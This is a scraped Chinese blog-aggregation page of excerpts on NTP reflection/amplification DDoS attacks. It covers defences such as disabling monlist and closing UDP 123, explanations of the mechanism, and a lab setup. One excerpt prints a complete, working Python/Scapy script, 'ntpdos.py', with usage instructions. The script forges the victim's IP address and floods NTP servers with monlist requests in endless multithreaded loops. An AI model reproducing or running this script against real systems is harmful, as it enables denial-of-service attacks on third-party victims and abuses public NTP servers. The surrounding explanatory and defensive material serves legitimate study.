精华内容
下载资源
问答
  • 2019-03-19 17:19:28

    如果防御NTP反射放大攻击

    1. 查看ntp服务器版本,升级到4.2.7p5以上

      ntpd -v

    2. 关闭现在 NTP 服务器的 monlist 功能,在ntp.conf配置文件末尾增加disable monitor选项

    3. 关闭服务器 udp 123端口

      firewall-cmd --remove-port=123/udp --permanent

    更多相关内容
  • 摘 要:提出了一种利用NTP反射放大攻击的特点,通过对中国大陆开放公共NTP服务的主机定期发起主动探测(执行monlist指令),利用返回信息对全球范围NTP反射类DRDoS攻击事件进行长期追踪观察和统计分析。...
  • NTP反射放大攻击(四)开炮!

    千次阅读 2019-03-19 15:51:43
    攻击者 安装python2.7 这个不用说 2.安装scapy 从网址下载:http://www.secdev.org/projects/scapy/files/scapy-2.3.1.zip ,也可以用wget scapy.net cp ~/Downloads/scapy-2.3.1.zip /root unzip scapy-2.3.1.zip...

    NTP反射放大攻击

    攻击者

    1. 安装python2.7 这个不用说

    2. 安装scapy

    从网址下载:http://www.secdev.org/projects/scapy/files/scapy-2.3.1.zip ,也可以用wget scapy.net

    cp ~/Downloads/scapy-2.3.1.zip /root
    unzip scapy-2.3.1.zip
    cd scapy-2.3.1
    python setup.py install
    

    3.编写攻击脚本

    from scapy.all import *
    import sys
    import threading
    import time
    import random	# For Random source port
    #NTP Amp DOS attack
    
    #usage ntpdos.py <target ip> <ntpserver list> <number of threads> ex: ntpdos.py 1.2.3.4 file.txt 10
    #FOR USE ON YOUR OWN NETWORK ONLY
    
    #Random source port added by JDMoore0883
    
    #packet sender
    def deny():
    	#Import globals to function
    	global ntplist
    	global currentserver
    	global data
    	global target
    	ntpserver = ntplist[currentserver] #Get new server
    	currentserver = currentserver + 1 #Increment for next 
    	packet = IP(dst=ntpserver,src=target)/UDP(sport=random.randint(2000,65533),dport=123)/Raw(load=data) #BUILD IT
    	send(packet,loop=1) #SEND IT
    
    #So I dont have to have the same stuff twice
    def printhelp():
    	print "NTP Amplification DOS Attack"
    	print "By DaRkReD"
    	print "Usage ntpdos.py <target ip> <ntpserver list> <number of threads>"
    	print "ex: ex: ntpdos.py 1.2.3.4 file.txt 10"
    	print "NTP serverlist file should contain one IP per line"
    	print "MAKE SURE YOUR THREAD COUNT IS LESS THAN OR EQUAL TO YOUR NUMBER OF SERVERS"
    	exit(0)
    
    try:
    	if len(sys.argv) < 4:
    		printhelp()
    	#Fetch Args
    	target = sys.argv[1]
    
    	#Help out idiots
    	if target in ("help","-h","h","?","--h","--help","/?"):
    		printhelp()
    
    	ntpserverfile = sys.argv[2]
    	numberthreads = int(sys.argv[3])
    	#System for accepting bulk input
    	ntplist = []
    	currentserver = 0
    	with open(ntpserverfile) as f:
    	    ntplist = f.readlines()
    
    	#Make sure we dont out of bounds
    	if  numberthreads > int(len(ntplist)):
    		print "Attack Aborted: More threads than servers"
    		print "Next time dont create more threads than servers"
    		exit(0)
    
    	#Magic Packet aka NTP v2 Monlist Packet
    	data = "\x17\x00\x03\x2a" + "\x00" * 4
    
    	#Hold our threads
    	threads = []
    	print "Starting to flood: "+ target + " using NTP list: " + ntpserverfile + " With " + str(numberthreads) + " threads"
    	print "Use CTRL+C to stop attack"
    
    	#Thread spawner
    	for n in range(numberthreads):
    	    thread = threading.Thread(target=deny)
    	    thread.daemon = True
    	    thread.start()
    
    	    threads.append(thread)
    
    	#In progress!
    	print "Sending..."
    
    	#Keep alive so ctrl+c still kills all them threads
    	while True:
    		time.sleep(1)
    except KeyboardInterrupt:
    	print("Script Stopped [ctrl + c]... Shutting down")
    	# Script ends here
    
    1. 在相对目录下建立文件 1.txt,里面存放ntp服务器的ip地址(10.112.254.141)
    2. 执行./ntpdos.py 192.168.101.146 1.txt 1

    效果展示

    攻击端
    在这里插入图片描述

    NTP服务器
    在这里插入图片描述

    服务器收到一个伪造来源的请求,反射回一个数据包

    受害者(NTP客户端):
    在这里插入图片描述

    攻击成功,由于网络环境较为简单,反射倍数不大,如果放在较为复杂的网络当中,NTP 服务器会向查询端返回与NTP 服务器进行过时间同步的最后 600 个客户端的 IP,响应包按照每 6 个 IP 进行分割,最多有 100 个响应包。反射流量将会瞬间使被攻击端被流量淹没~

    展开全文
  • NTP反射放大攻击(一)知识点扫盲

    千次阅读 2019-03-19 14:50:53
    NTP反射放大攻击知识点扫盲 什么是NTP服务 NTP是网络时间协议(Network Time Protocol),它是用来同步网络中各个计算机的时间的协议 在计算机的世界里,时间非常地重要,例如对于火箭发射这种科研活动,对时间的统一...

    NTP反射放大攻击知识点扫盲

    什么是NTP服务

    NTP是网络时间协议(Network Time Protocol),它是用来同步网络中各个计算机的时间的协议

    在计算机的世界里,时间非常地重要,例如对于火箭发射这种科研活动,对时间的统一性和准确性要求就非常地高,是按照A这台计算机的时间,还是按照B这台计算机的时间?NTP就是用来解决这个问题的,NTP(Network Time Protocol,网络时间协议)是用来使网络中的各个计算机时间同步的一种协议。它的用途是把计算机的时钟同步到世界协调时UTC,其精度在局域网内可达0.1ms,在互联网上绝大多数的地方其精度可以达到1-50ms。
    它可以使计算机对其服务器或时钟源(如石英钟,GPS等等)进行时间同步,它可以提供高精准度的时间校正,而且可以使用加密确认的方式来防止病毒的协议攻击。

    NTP反射放大攻击

    先来说什么是放射放大攻击。

    无论是基于 DNS 还是基于 NTP,其最终都是基于 UDP 协议的。在 UDP 协议中正常情况下客户端发送请求包到服务端,服务端返回响应包到客户端,但是 UDP 协议是面向无连接的,所以客户端发送请求包的源 IP 很容易进行伪造,当把源 IP 修改为受害者的 IP,最终服务端返回的响应包就会返回到受害者的 IP。这就形成了一次反射攻击。

    NTP反射放大攻击是一种分布式拒绝服务(DDoS)攻击,其中攻击者利用网络时间协议(NTP)服务器功能,以便用一定数量的UDP流量压倒目标网络或服务器,使常规流量无法访问目标及其周围的基础设施。

    标准NTP 服务提供了一个 monlist查询功能,也被称为MON_GETLIST,该功能主要用于监控 NTP 服务器的服务状况,当用户端向NTP服务提交monlist查询时,NTP 服务器会向查询端返回与NTP 服务器进行过时间同步的最后 600 个客户端的 IP,响应包按照每 6 个 IP 进行分割,最多有 100 个响应包。由于NTP服务使用UDP协议,攻击者可以伪造源发地址向NTP服务进行monlist查询,这将导致NTP服务器向被伪造的目标发送大量的UDP数据包,理论上这种恶意导向的攻击流量可以放大到伪造查询流量的100倍。

    NTP放大攻击可以分为四个步骤:

    1. 攻击者使用僵尸网络,将带有欺骗IP地址的UDP数据包发送到启用了monlist命令的NTP服务器。每个数据包上的欺骗IP地址指向受害者的真实IP地址。
    2. 每个UDP数据包使用其monlist命令向NTP服务器发出请求,从而产生大量响应。
    3. 服务器使用结果数据,响应欺骗地址。
    4. 目标的IP地址接收响应,周围的网络基础设施因流量泛滥而变得不堪重负,导致拒绝服务。

    一些新闻

    在这里插入图片描述

    展开全文
  • 1.什么是NTP服务? NTP是网络时间协议(Network Time Protocol),它是用来同步网络中各个计算机的时间的协议 在计算机的世界里,时间非常地重要,例如对于火箭发射这种科研活动,对时间的统一性和准确性要求就非常地...

    1.什么是NTP服务?

    NTP是网络时间协议(Network Time Protocol),它是用来同步网络中各个计算机的时间的协议

    在计算机的世界里,时间非常地重要,例如对于火箭发射这种科研活动,对时间的统一性和准确性要求就非常地高,是按照A这台计算机的时间,还是按照B这台计算机的时间?NTP就是用来解决这个问题的,NTP(Network Time Protocol,网络时间协议)是用来使网络中的各个计算机时间同步的一种协议。它的用途是把计算机的时钟同步到世界协调时UTC,其精度在局域网内可达0.1ms,在互联网上绝大多数的地方其精度可以达到1-50ms。
    它可以使计算机对其服务器或时钟源(如石英钟,GPS等等)进行时间同步,它可以提供高精准度的时间校正,而且可以使用加密确认的方式来防止病毒的协议攻击。

    2.攻击方式详情

    先来说什么是放射放大攻击。

    无论是基于 DNS 还是基于 NTP,其最终都是基于 UDP 协议的。在 UDP 协议中正常情况下客户端发送请求包到服务端,服务端返回响应包到客户端,但是 UDP 协议是面向无连接的,所以客户端发送请求包的源 IP 很容易进行伪造,当把源 IP 修改为受害者的 IP,最终服务端返回的响应包就会返回到受害者的 IP。这就形成了一次反射攻击。

    NTP反射放大攻击是一种分布式拒绝服务(DDoS)攻击,其中攻击者利用网络时间协议(NTP)服务器功能,以便用一定数量的UDP流量压倒目标网络或服务器,使常规流量无法访问目标及其周围的基础设施。

    标准NTP 服务提供了一个 monlist查询功能,也被称为MON_GETLIST,该功能主要用于监控 NTP 服务器的服务状况,当用户端向NTP服务提交monlist查询时,NTP 服务器会向查询端返回与NTP 服务器进行过时间同步的最后 600 个客户端的 IP,响应包按照每 6 个 IP 进行分割,最多有 100 个响应包。由于NTP服务使用UDP协议,攻击者可以伪造源发地址向NTP服务进行monlist查询,这将导致NTP服务器向被伪造的目标发送大量的UDP数据包,理论上这种恶意导向的攻击流量可以放大到伪造查询流量的100倍。

    NTP放大攻击可以分为四个步骤:

    攻击者使用僵尸网络,将带有欺骗IP地址的UDP数据包发送到启用了monlist命令的NTP服务器。每个数据包上的欺骗IP地址指向受害者的真实IP地址。
    每个UDP数据包使用其monlist命令向NTP服务器发出请求,从而产生大量响应。
    服务器使用结果数据,响应欺骗地址。
    目标的IP地址接收响应,周围的网络基础设施因流量泛滥而变得不堪重负,导致拒绝服务。

    展开全文
  • NTP反射放大攻击场景搭建 原理 攻击者冒充受害者(NTP客户端)的ip地址,向NTP服务器发送请求消息(很小),ntp服务器收到消息后向受害者返回响应数据包(很大) 安装NTP服务器 一般情况下,选择基本的桌面版安装...
  • 记一次ntp反射放大ddos攻击

    千次阅读 2018-03-27 17:09:00
    后续解决办法:通过跳板登录生产服务器,通过抓包可看出是NTP反射放大攻击,直接关闭ntp服务,如果需要用到ntp服务,之后再在安全组和防火墙设置屏蔽规则,拦截目的或者源端口为相应服务端口(123)...
  • NTP DDoS反射放大攻击实验

    千次阅读 2020-06-08 17:50:55
    NTP:Network Time Protocol 网络时间协议(NTP)是一种通过因特网服务于计算机时钟的同步时间协议。它提供了一种同步时间机制,能...NTP 反射放大攻击 无论是基于 DNS 还是基于 NTP,其最终都是基于 UDP 协议的。在
  • 当你的时间设置和NTP服务器的时间相差很大的时候,NTP会花上较长一段时间进行调整.所以手动同步可以减少这段时间 配置和运行NTP Server 现在我们就来创建NTP的配置文件了, 它就是/etc/ntp.conf. 我们只...
  • NTP放大攻击

    2021-05-11 05:08:50
    首先NTP放大需要一台可以伪造IP的服务器,不能伪造欺骗的没有任何效果的。先上个效果图。ps:你需要一台服务器,而且能欺骗的服务器,不是服务器都可以的。不能欺骗的服务器攻击是没有任何效果的 这次带来安装攻击脚本...
  • NTP服务放大攻击的解决办法

    千次阅读 2017-04-13 14:34:17
    转载:什么是NTP服务?网络时间协议NTP(Network Time Protocol)是用于互联网中时间同步的标准互联网协议。...什么是NTP服务放大攻击?标准NTP 服务提供了一个 monlist查询功能,也被称为MON_GETLIST,该功能主
  • NTP服务器【Network Time Protocol(NTP)】是用来使计算机时间同步化的一种协议,它可以使计算机对其服务器或时钟源(如石英钟,GPS等等)做同步化,它可以提供高精准度的时间校正(LAN上与标准间差小于1毫秒,WAN上几十...
  • 基于 NTP反射放大攻击

    万次阅读 2017-05-09 18:45:11
    原文地址:  ... 只做个人学习之用 ...最近一段时间 DDoS 攻击事件让基于 NTP 的 DDoS 攻击变得很火热,先看看下面的信息感受下: “It was a very large DDoS targeting a CloudFlare customer,” M
  • 简单地说:中间件并没有实现TCP的标准,很多情况下只监控单向的报文,并根据数据包进行响应,其响应数据包较大,导致存在反射放大攻击。 这留下了一些问题:触发这些中间件的最佳方式是什么,我们可以从中获得哪些...
  • DNS放大:产生大流量的攻击方法-----单机的带宽优势,巨大的单机数量形成的流量汇聚,利用协议特性实现放大效果的流量DNS协议放大效果----查询请求流量小,但响应流量可能非常巨大(dig ANY baidu.com @8.8.8.8流量放...
  • 浅谈基于 NTP反射放大攻击

    千次阅读 2018-03-12 03:54:34
    浅谈基于 NTP反射放大攻击转载于:https://www.2cto.com/article/201402/278775.html0x01 一些案例最近一段时间 DDoS 攻击事件让基于 NTP 的 DDoS 攻击变得很火热,先看看下面的信息感受下:“It was a very ...
  • 我这当代雷锋当然非常乐意了,于是我就和stream联系(勾搭)上了,今天我就详细讲一下我们一起复现NTP反射攻击的过程。 0×02 分析攻击数据 stream大兄弟把当时抓到的包发给了我,数据包不大只有31.4M ...
  • 本节学习NTP放大攻击
  • DDOS攻击之NTP放大攻击

    2020-12-24 08:52:46
    NTP放大攻击是一种基于反射的体积分布式拒绝服务(DDoS)攻击,其中攻击者利用网络时间协议(NTP)服务器功能,以便用一定数量的UDP流量压倒目标网络或服务器,使常规流量无法访问目标及其周围的基础设施。NTP放大攻击...
  • 分布式拒绝服务攻击(Distributed Denial of Service)简称DDoS,亦称为阻断攻击或洪水攻击,是目前互联网最常见的一种攻击形式。DDoS攻击通常通过来自大量受感染的计算机(即僵尸网络)的流量,对目标网站或整个...
  • DNS放大:产生大流量的攻击方法-----单机的带宽优势,巨大的单机数量形成的流量汇聚,利用协议特性实现放大效果的流量DNS协议放大效果----查询请求流量小,但响应流量可能非常巨大(dig ANY baidu.com @8.8.8.8流量放...
  • 网络安全之反射放大型DDOS

    千次阅读 热门讨论 2021-03-01 21:19:38
    反射放大型DDOS即利用反射手段将分布式拒绝服务攻击进一步放大,同时隐藏掉自己的身份。 为了防止这种网络攻击,我们需要弄清其原理,从而更好的保障信息财产安全。 接下来从三步走的方式弄懂反射放大型DDOS的原理、...
  • polestar · 2014/02/22 12:370x00 背景前两天,心伤的胖子发表了一篇《浅谈基于 NTP反射放大攻击》我之所以又写一篇和NTP有关的文章,是因为前面有些东西没提,或说的不够清楚,浅陋之处,欢迎大家指正留言,...

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 413
精华内容 165
关键字:

ntp反射放大攻击

友情链接: PHPDug.zip